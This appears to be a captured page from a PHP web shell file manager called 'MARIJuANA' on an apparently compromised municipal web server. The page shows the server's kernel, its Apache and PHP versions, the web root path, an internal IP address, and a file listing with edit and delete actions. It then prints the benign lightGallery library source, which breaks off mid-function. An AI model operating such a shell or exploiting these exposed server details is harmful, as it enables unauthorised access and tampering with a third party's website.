MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/morro_chapeu/public_html/portal/assets/js/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
bootstrap.js 53.963 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
bootstrap.min.js 28.428 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
custombox.min.js 14.544 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
demo-backup.js 0.724 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
demo.js 0.716 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
engo-plugins.js 3.196 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
instafeed.min.js 6.625 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
jquery-3.1.1.min.js 93.542 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
jquery.bxslider.js 63.705 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
jquery.elevatezoom.js 57.49 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
jquery.lazyimage.js 8.666 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
jquery.mousewheel.min.js 2.712 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
jquery.themepunch.plugins.min.js 83.222 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
jquery.themepunch.revolution.min.js 106.223 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
legacy.min.js 9.882 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
lg-autoplay.js 5.593 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
lg-thumbnail.js 14.874 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
lightgallery.js 42.089 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
map-icons.js 3.869 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
masonry.pkgd.min.js 23.048 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
owl.carousel.min.js 39.319 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
slick.min.js 40.97 KB -rw-rw-r-- 2021-05-10 07:43 R E G D
slideyoutube.js 1.54 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
store.js 14.368 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
wow.min.js 8.218 KB -rw-rw-r-- 2021-05-10 07:42 R E G D
REQUEST EXIT
/*! lightgallery - v1.2.22 - 2016-07-20 * http://sachinchoolur.github.io/lightGallery/ * Copyright (c) 2016 Sachin N; Licensed Apache 2.0 */ (function($, window, document, undefined) { 'use strict'; var defaults = { mode: 'lg-slide', // Ex : 'ease' cssEasing: 'ease', //'for jquery animation' easing: 'linear', speed: 600, height: '100%', width: '100%', addClass: '', startClass: 'lg-start-zoom', backdropDuration: 150, hideBarsDelay: 6000, useLeft: false, closable: true, loop: true, escKey: true, keyPress: true, controls: true, slideEndAnimatoin: true, hideControlOnEnd: false, mousewheel: true, getCaptionFromTitleOrAlt: true, // .lg-item || '.lg-sub-html' appendSubHtmlTo: '.lg-sub-html', subHtmlSelectorRelative: false, /** * @desc number of preload slides * will exicute only after the current slide is fully loaded. * * @ex you clicked on 4th image and if preload = 1 then 3rd slide and 5th * slide will be loaded in the background after the 4th slide is fully loaded.. * if preload is 2 then 2nd 3rd 5th 6th slides will be preloaded.. ... ... * */ preload: 1, showAfterLoad: true, selector: '', selectWithin: '', nextHtml: '', prevHtml: '', // 0, 1 index: false, iframeMaxWidth: '100%', download: true, counter: true, appendCounterTo: '.lg-toolbar', swipeThreshold: 50, enableSwipe: true, enableDrag: true, dynamic: false, dynamicEl: [], galleryId: 1 }; function Plugin(element, options) { // Current lightGallery element this.el = element; // Current jquery element this.$el = $(element); // lightGallery settings this.s = $.extend({}, defaults, options); // When using dynamic mode, ensure dynamicEl is an array if (this.s.dynamic && this.s.dynamicEl !== 'undefined' && this.s.dynamicEl.constructor === Array && !this.s.dynamicEl.length) { throw ('When using dynamic mode, you must also define dynamicEl as an Array.'); } // lightGallery modules this.modules = {}; // false when lightgallery complete first slide; this.lGalleryOn = false; this.lgBusy = false; // Timeout function for hiding controls; this.hideBartimeout = false; // To determine browser supports for touch events; this.isTouch = ('ontouchstart' in document.documentElement); // Disable hideControlOnEnd if sildeEndAnimation is true if (this.s.slideEndAnimatoin) { this.s.hideControlOnEnd = false; } // Gallery items if (this.s.dynamic) { this.$items = this.s.dynamicEl; } else { if (this.s.selector === 'this') { this.$items = this.$el; } else if (this.s.selector !== '') { if (this.s.selectWithin) { this.$items = $(this.s.selectWithin).find(this.s.selector); } else { this.$items = this.$el.find($(this.s.selector)); } } else { this.$items = this.$el.children(); } } // .lg-item this.$slide = ''; // .lg-outer this.$outer = ''; this.init(); return this; } Plugin.prototype.init = function() { var _this = this; // s.preload should not be more than $item.length if (_this.s.preload > _this.$items.length) { _this.s.preload = _this.$items.length; } // if dynamic option is enabled execute immediately var _hash = window.location.hash; if (_hash.indexOf('lg=' + this.s.galleryId) > 0) { _this.index = parseInt(_hash.split('&slide=')[1], 10); $('body').addClass('lg-from-hash'); if (!$('body').hasClass('lg-on')) { setTimeout(function() { _this.build(_this.index); }); $('body').addClass('lg-on'); } } if (_this.s.dynamic) { _this.$el.trigger('onBeforeOpen.lg'); _this.index = _this.s.index || 0; // prevent accidental double execution if (!$('body').hasClass('lg-on')) { setTimeout(function() { _this.build(_this.index); $('body').addClass('lg-on'); }); } } else { // Using different namespace for click because click event should not unbind if selector is same object('this') _this.$items.on('click.lgcustom', function(event) { // For IE8 try { event.preventDefault(); event.preventDefault(); } catch (er) { event.returnValue = false; } _this.$el.trigger('onBeforeOpen.lg'); _this.index = _this.s.index || _this.$items.index(this); // prevent accidental double execution if (!$('body').hasClass('lg-on')) { _this.build(_this.index); $('body').addClass('lg-on'); } }); } }; Plugin.prototype.build = function(index) { var _this = this; _this.structure(); // module constructor $.each($.fn.lightGallery.modules, function(key) {